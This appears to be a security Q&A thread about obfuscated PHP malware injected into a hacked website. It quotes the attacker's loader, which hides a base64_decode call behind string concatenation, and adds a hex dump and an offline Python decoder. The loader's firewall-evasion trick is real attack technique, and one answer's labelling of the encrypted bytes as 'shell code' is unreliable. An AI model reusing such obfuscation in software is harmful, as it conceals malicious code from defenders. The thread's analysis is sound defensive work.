
Recently I saw that a domain of mine was hacked and the hacker had injected his code in some encrypted format, as below.

<?php $l___l_='base'.(32*2).'_de'.'code';$l___l_=$l___l_(str_replace("\n", '', 'D+I/q0Gc5hiUdrnOss2HvSvTg1sG8Q6rE6jWEaBtDzQFKd1Er6yZI1MBfxpqll488V7Tbm3phDbBFAwG
k5MLq6NbLAXb69v3jtw65S0KD5Nx2R8ROgea8Z0z1b/1amqjjy706S1+QQ2+nJYjdf8QYi0ic4kArurt
yE+zVXve7+PByfRZYTFOL7f+0YwcE/+JilFvFyJjOuid8BGS2mlNGOQfnhKnE5hx6rqcKCtrfk29fJNM
s+r1ppMJoVjBbstGuXjMHXYCPlD90sncCTKs/zartN4bBWXeSWp585mZc+OeYVL5mJcPxJn673e62z+y
rROT7OcGEMyd7LCDyMB41OwG6Q5VDAv0wZNelA+Yz0JiYd4nahYoWC/35syZlXQr136ftUc+8gR9xfQW
gG1d2mOxcozGxZbuM9mB80UyYxmXnRDBocwKeR8uTPTiAEXWocDxXLwuCrfhkLZuAvHG2b857X8uqx68
nS8+XSMFquYb6spb8irA

I was wondering if anyone knows how to decode it. I want to see his code. Is there any online site available? Doing some research, some sites show that it follows the following encryption:

str_replace --> base64_decode --> md5

Prakash
    MD5 is not an encryption algorithm, it's hashing. It's not possible to reverse the hashing (but creating a collision is). And there's no MD5 in the code... – ThoriumBR Mar 09 '15 at 18:09

2 Answers


It's a base64-encoded payload. Web firewalls are familiar with base64-encoded payloads and try to defend against them, hence the attacker is using a technique to evade firewalls that search for and filter the call to base64_decode.

Eventually the $l___l_ parameter will hold the decoded content.

So instead he constructs it as follows:

$l___l_='base'.(32*2).'_de'.'code' => base64_decode
$l___l_=$l___l_(//content) => base64_decode(content) => decoded content

The string replace just deletes the new lines (\n) from the content before decoding.

From studying a similar-looking attack on this blog, it seems that the content you receive after base64 decoding is an encrypted payload. The password to decrypt the payload is obtained by a POST request to another server.

aviv

MD5 is a hash function, not encryption. Base64 is an encoding to represent non-printable characters as printable characters. The quick bit of code he's written simply removes the new lines in the Base64 string you see there, and decodes it to what will probably be his shell code.

You can decode Base64 from this website. The shell code given looks like the following:

0f  e2  3f  ab  41  9c  e6  18  94  76  b9  ce  b2  cd  87  bd  
2b  d3  83  5b  06  f1  0e  ab  13  a8  d6  11  a0  6d  0f  34  
05  29  dd  44  af  ac  99  23  53  01  7f  1a  6a  96  5e  3c  
f1  5e  d3  6e  6d  e9  84  36  c1  14  0c  06  93  93  0b  ab  
a3  5b  2c  05  db  eb  db  f7  8e  dc  3a  e5  2d  0a  0f  93  
71  d9  1f  11  3a  07  9a  f1  9d  33  d5  bf  f5  6a  6a  a3  
8f  2e  f4  e9  2d  7e  41  0d  be  9c  96  23  75  ff  10  62  
2d  22  73  89  00  ae  ea  ed  c8  4f  b3  55  7b  de  ef  e3  
c1  c9  f4  59  61  31  4e  2f  b7  fe  d1  8c  1c  13  ff  89  
8a  51  6f  17  22  63  3a  e8  9d  f0  11  92  da  69  4d  18  
e4  1f  9e  12  a7  13  98  71  ea  ba  9c  28  2b  6b  7e  4d  
bd  7c  93  4c  b3  ea  f5  a6  93  09  a1  58  c1  6e  cb  46  
b9  78  cc  1d  76  02  3e  50  fd  d2  c9  dc  09  32  ac  ff  
36  ab  b4  de  1b  05  65  de  49  6a  79  f3  99  99  73  e3  
9e  61  52  f9  98  97  0f  c4  99  fa  ef  77  ba  db  3f  b2  
ad  13  93  ec  e7  06  10  cc  9d  ec  b0  83  c8  c0  78  d4  
ec  06  e9  0e  55  0c  0b  f4  c1  93  5e  94  0f  98  cf  42  
62  61  de  27  6a  16  28  58  2f  f7  e6  cc  99  95  74  2b  
d7  7e  9f  b5  47  3e  f2  04  7d  c5  f4  16  80  6d  5d  da  
63  b1  72  8c  c6  c5  96  ee  33  d9  81  f3  45  32  63  19  
97  9d  10  c1  a1  cc  0a  79  1f  2e  4c  f4  e2  00  45  d6  
a1  c0  f1  5c  bc  2e  0a  b7  e1  90  b6  6e  02  f1  c6  d9  
bf  39  ed  7f  2e  ab  1e  bc  9d  2f  3e  5d  23  05  aa  e6  
1b  ea  ca  5b  f2  2a  c0

You could try disassembling the code above using an online disassembler, using a single string like the one below of the shellcode above:

0f  e2  3f  ab  41  9c  e6  18  94  76  b9  ce  b2  cd  87  bd  2b  d3  83  5b  06  f1  0e  ab  13  a8  d6  11  a0  6d  0f  34  05  29  dd  44  af  ac  99  23  53  01  7f  1a  6a  96  5e  3c  f1  5e  d3  6e  6d  e9  84  36  c1  14  0c  06  93  93  0b  ab  a3  5b  2c  05  db  eb  db  f7  8e  dc  3a  e5  2d  0a  0f  93  71  d9  1f  11  3a  07  9a  f1  9d  33  d5  bf  f5  6a  6a  a3  8f  2e  f4  e9  2d  7e  41  0d  be  9c  96  23  75  ff  10  62  2d  22  73  89  00  ae  ea  ed  c8  4f  b3  55  7b  de  ef  e3  c1  c9  f4  59  61  31  4e  2f  b7  fe  d1  8c  1c  13  ff  89  8a  51  6f  17  22  63  3a  e8  9d  f0  11  92  da  69  4d  18  e4  1f  9e  12  a7  13  98  71  ea  ba  9c  28  2b  6b  7e  4d  bd  7c  93  4c  b3  ea  f5  a6  93  09  a1  58  c1  6e  cb  46  b9  78  cc  1d  76  02  3e  50  fd  d2  c9  dc  09  32  ac  ff  36  ab  b4  de  1b  05  65  de  49  6a  79  f3  99  99  73  e3  9e  61  52  f9  98  97  0f  c4  99  fa  ef  77  ba  db  3f  b2  ad  13  93  ec  e7  06  10  cc  9d  ec  b0  83  c8  c0  78  d4  ec  06  e9  0e  55  0c  0b  f4  c1  93  5e  94  0f  98  cf  42  62  61  de  27  6a  16  28  58  2f  f7  e6  cc  99  95  74  2b  d7  7e  9f  b5  47  3e  f2  04  7d  c5  f4  16  80  6d  5d  da  63  b1  72  8c  c6  c5  96  ee  33  d9  81  f3  45  32  63  19  97  9d  10  c1  a1  cc  0a  79  1f  2e  4c  f4  e2  00  45  d6  a1  c0  f1  5c  bc  2e  0a  b7  e1  90  b6  6e  02  f1  c6  d9  bf  39  ed  7f  2e  ab  1e  bc  9d  2f  3e  5d  23  05  aa  e6  1b  ea  ca  5b  f2  2a  c0

Hope this helps!

RoraΖ
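Both answers arrive at the same two facts: the odd concatenation resolves to base64_decode, and the blob decodes to binary rather than to readable PHP. As an added example that is not code from the question or from either answer, the Python below does that triage offline: it resolves the constructed function name without executing any PHP, flags the `$v = $v(...)` variable-function idiom, strips the newlines and base64-decodes the blob exactly as the loader would, and reports whether the result looks like text. The PHP snippet and blob are the ones quoted in the question (the snippet is reproduced cut off, as it appears there); the function names are this example's own choices.

```python
"""Offline triage of the obfuscated PHP loader quoted in the question.

Added example: not code from the question or either answer. PHP_SOURCE is
the snippet quoted in the question (cut off there, reproduced cut off
here); every function name below is this example's own choice.
"""
import ast
import base64
import operator
import re

PHP_SOURCE = r"""<?php $l___l_='base'.(32*2).'_de'.'code';$l___l_=$l___l_(str_replace("\n", '', 'D+I/q0Gc5hiUdrnOss2HvSvTg1sG8Q6rE6jWEaBtDzQFKd1Er6yZI1MBfxpqll488V7Tbm3phDbBFAwG
k5MLq6NbLAXb69v3jtw65S0KD5Nx2R8ROgea8Z0z1b/1amqjjy706S1+QQ2+nJYjdf8QYi0ic4kArurt
yE+zVXve7+PByfRZYTFOL7f+0YwcE/+JilFvFyJjOuid8BGS2mlNGOQfnhKnE5hx6rqcKCtrfk29fJNM
s+r1ppMJoVjBbstGuXjMHXYCPlD90sncCTKs/zartN4bBWXeSWp585mZc+OeYVL5mJcPxJn673e62z+y
rROT7OcGEMyd7LCDyMB41OwG6Q5VDAv0wZNelA+Yz0JiYd4nahYoWC/35syZlXQr136ftUc+8gR9xfQW
gG1d2mOxcozGxZbuM9mB80UyYxmXnRDBocwKeR8uTPTiAEXWocDxXLwuCrfhkLZuAvHG2b857X8uqx68
nS8+XSMFquYb6spb8irA"""

# Integer arithmetic the loader hides a digit pair behind, e.g. (32*2) -> 64.
_ARITH_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}

def _eval_arith(node):
    """Evaluate a tiny arithmetic AST safely; anything else is rejected."""
    if isinstance(node, ast.Expression):
        return _eval_arith(node.body)
    if isinstance(node, ast.Constant) and isinstance(node.value, int):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in _ARITH_OPS:
        return _ARITH_OPS[type(node.op)](_eval_arith(node.left), _eval_arith(node.right))
    raise ValueError("unsupported arithmetic: %r" % ast.dump(node))

def resolve_php_string_expr(expr):
    """Resolve 'base'.(32*2).'_de'.'code' to 'base64_decode' without running PHP.
    Handles single-quoted literals, parenthesised integer arithmetic and '.'."""
    parts = []
    for piece in re.split(r"\s*\.\s*", expr.strip()):
        if len(piece) >= 2 and piece[0] == piece[-1] == "'":
            parts.append(piece[1:-1])
        elif piece.startswith("(") and piece.endswith(")"):
            parts.append(str(_eval_arith(ast.parse(piece[1:-1], mode="eval"))))
        else:
            raise ValueError("unsupported piece: %r" % piece)
    return "".join(parts)

# $v = <string expression>;   and   $v = $v(...);  (a call through a variable)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*((?:'[^']*'|\(\s*\d+\s*[*+-]\s*\d+\s*\)|\s*\.\s*)+)\s*;")
VAR_CALL_RE = re.compile(r"\$(\w+)\s*=\s*\$(\w+)\s*\(")
# A long run of base64 alphabet (newlines included) opened by a single quote;
# no closing quote is required because the quoted snippet is cut off.
BLOB_RE = re.compile(r"'([A-Za-z0-9+/\n]{40,}=*)")

def find_variable_function_calls(php_source):
    """Return (callee_variable, resolved_name_or_None) for each $v = $v( call."""
    resolved = {}
    for m in ASSIGN_RE.finditer(php_source):
        try:
            resolved[m.group(1)] = resolve_php_string_expr(m.group(2))
        except ValueError:
            continue
    return [(m.group(2), resolved.get(m.group(2))) for m in VAR_CALL_RE.finditer(php_source)]

def decode_blob(blob):
    """Mirror str_replace("\\n", '', ...) + base64_decode; reject stray characters."""
    return base64.b64decode(blob.replace("\n", ""), validate=True)

def is_mostly_printable(data, threshold=0.9):
    """True if the bytes look like text (PHP source would score near 1.0)."""
    text_bytes = sum(1 for b in data if 0x20 <= b < 0x7F or b in (0x09, 0x0A, 0x0D))
    return len(data) > 0 and text_bytes / len(data) >= threshold

def hexdump(data, width=16):
    return "\n".join(" ".join("%02x" % b for b in data[i:i + width]) for i in range(0, len(data), width))

def triage(php_source):
    """Summarise what the loader calls and what the blob decodes to."""
    m = BLOB_RE.search(php_source)
    decoded = decode_blob(m.group(1)) if m else b""
    return {
        "callees": find_variable_function_calls(php_source),
        "decoded_len": len(decoded),
        "decoded_head": decoded[:4].hex(),
        "decoded_tail": decoded[-3:].hex(),
        "looks_like_text": is_mostly_printable(decoded),
        "hexdump": hexdump(decoded),
    }

if __name__ == "__main__":
    result = triage(PHP_SOURCE)
    for key in ("callees", "decoded_len", "decoded_head", "decoded_tail", "looks_like_text"):
        print("%-16s %r" % (key, result[key]))
    print(result["hexdump"])
```

Run directly, it prints the 375 decoded bytes 16 per line, starting 0f e2 3f ab as in the second answer, and reports that the printable ratio is far below what PHP source would have, which is consistent with the first answer's point that another decryption layer follows. The `validate=True` on the base64 call is deliberate: the loader's str_replace only strips newlines, so any other stray character in a sample you are handed is a transcription error to investigate, not something to drop silently.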